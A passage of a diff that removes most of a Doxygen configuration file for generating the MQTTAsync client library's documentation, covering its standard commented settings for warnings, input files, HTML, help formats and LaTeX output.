-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTAsync_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = MQTTAsync.h \
-                         MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain images that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# none of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# The DOCSET_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The DOCSET_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NO
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANSPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be used to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
